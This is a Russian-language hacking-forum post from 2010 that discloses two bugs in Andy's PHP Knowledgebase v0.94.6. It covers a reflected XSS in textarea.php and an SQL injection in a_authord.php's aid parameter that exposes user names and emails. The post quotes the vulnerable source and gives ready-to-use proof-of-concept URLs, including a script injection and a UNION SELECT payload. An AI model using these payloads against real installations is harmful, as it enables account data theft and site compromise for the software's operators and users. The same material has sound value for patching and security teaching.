06.04.2010, 06:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Бред, но напишу):
http://aphpkb.org/
Andy's PHP Knowledgebase v0.94.6 © Andy Grayndler 2010
XSS
/textarea.php
PHP код:
<?php //textarea.php -- default textarea
echo '<textarea name="' . $textareaname . '" style="width:95%; height:300px">' .
$textareacontent . '</textarea>';
?>
Условие:
rg=on
Результат:
http://site/textarea.php?textareacontent=</textarea> [xss]
http://localhost/know/textarea.php?textareacontent=</textarea><script>alert(123)</script>
И куча других скриптов. Не буду бред постить!
SQL inj
/a_authord.php - даные о пользователях!
PHP код:
...include('./functions.php');
require_once ('./config/auth.php');
require ('./config/config.php');
include"./config/dbsettings.php";
$num = $_GET[aid];
$query = "SELECT CONCAT(FirstName, ' ', LastName) AS name, UserName, Email, DATE_FORMAT(RegistrationDate, '%M %d, %Y') AS dr FROM authors WHERE AuthorID='{$num}'";...
Уловия:
- админка;
- mg=off.
Резльутат:
http://site/a_authord.php?aid=1 [sql]
http://site/a_authord.php?aid=1%27+union+select+1,version%28%2 9,3,4--+
Последний раз редактировалось Strilo4ka; 06.04.2010 в 06:59..
|
|
|